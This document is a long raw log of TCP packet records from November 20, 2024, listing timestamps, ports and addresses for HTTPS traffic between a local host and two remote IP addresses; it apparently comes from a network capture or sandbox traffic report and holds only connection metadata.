                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204521894 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204740047 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204752922 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.346075058 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.346101999 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.346164942 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.346188068 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.346354961 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.352224112 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.352250099 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.352308989 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.352320910 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.352880955 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.357135057 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.357155085 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.357251883 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.357260942 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.357417107 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.363413095 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.363440990 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.363477945 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.363487959 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.363606930 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.373549938 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.373575926 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.373652935 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.373663902 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.373811007 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.380264044 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.380289078 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.380345106 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.380354881 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.380481958 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.387186050 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.387207985 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.387279034 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.387298107 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.387412071 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.391694069 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.391711950 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.398763895 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.398776054 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.402364016 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.547338009 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.547365904 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.547432899 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.547451973 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.547502995 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.554187059 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.554208994 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.555196047 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.555216074 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.559139967 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.561310053 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.561335087 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.561400890 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.561414003 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.561531067 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.567703009 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.567718983 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.567861080 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.567872047 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.568021059 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.574811935 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.574831963 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.574932098 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.574940920 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.575067043 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.580414057 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.580445051 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.585011959 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.585022926 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.585655928 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.585676908 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.592283964 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.592299938 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.600565910 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.600604057 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.612476110 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.613640070 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.754322052 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.754337072 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.754386902 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.754405975 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.754415989 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.754439116 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.754834890 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.758578062 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.758591890 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.758631945 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.758666992 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.758676052 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.758999109 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.766184092 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.766211033 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.766269922 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.766283989 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.766453981 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.773545980 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.773570061 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.773619890 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.773627996 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.773896933 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.779392958 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.779421091 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.779493093 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.779501915 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.779674053 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.790397882 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.790457964 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.793833017 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.793847084 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.794574022 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.796680927 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.796703100 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.796830893 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.796837091 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.796961069 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.803932905 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.803956032 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.808592081 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.808599949 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.809175014 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.821337938 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.821362972 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.821476936 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.821484089 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.821754932 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.949403048 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.953052044 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.963473082 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.963499069 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.971436977 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.971486092 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.972378969 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.972392082 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.973491907 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.973556042 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.977974892 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.977996111 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.978472948 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.978482008 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.978612900 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.979011059 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.979039907 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.979127884 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.979136944 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.979901075 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.980354071 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.980366945 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.983161926 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.983350992 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.985132933 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.985151052 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.987401009 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.987557888 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.992454052 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.992491961 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.998138905 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.999612093 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.999624968 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.999732018 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000268936 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000322104 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000361919 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000366926 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000380039 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000431061 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000683069 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000699043 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000803947 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.000813007 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.001147032 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.001209021 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.001281023 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.001521111 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.001633883 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.001730919 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.002136946 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.002185106 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.004575968 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.004693985 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.004925013 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.005008936 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.005141020 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.005158901 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.006098986 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.006257057 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047085047 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047096968 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047158003 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047164917 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047173023 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047180891 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047188044 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.047193050 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.071310043 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.076839924 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.107214928 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.122129917 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.122179985 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.122184038 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.169720888 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.188834906 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.202941895 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.204598904 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.218350887 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.225689888 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.263439894 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.269392014 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.272293091 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.297981977 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.347626925 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.357846975 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372102976 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372122049 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372211933 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372251034 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372302055 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372314930 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372407913 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372437954 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372545958 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372551918 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372730017 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372731924 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372744083 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372757912 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372844934 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372867107 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372900963 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372937918 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.372947931 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373013973 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373339891 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373382092 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373411894 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373459101 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373470068 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373475075 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373478889 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373497963 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373517036 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373538017 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373538017 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.373575926 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.374389887 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.374407053 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.382534027 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.385931015 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.416094065 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.421175957 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.421180964 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.421262980 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.421494961 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.421535969 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.421595097 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.432594061 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.432960033 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.433079958 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.433139086 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.438752890 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.438771963 CET49815443192.168.2.12104.16.102.112
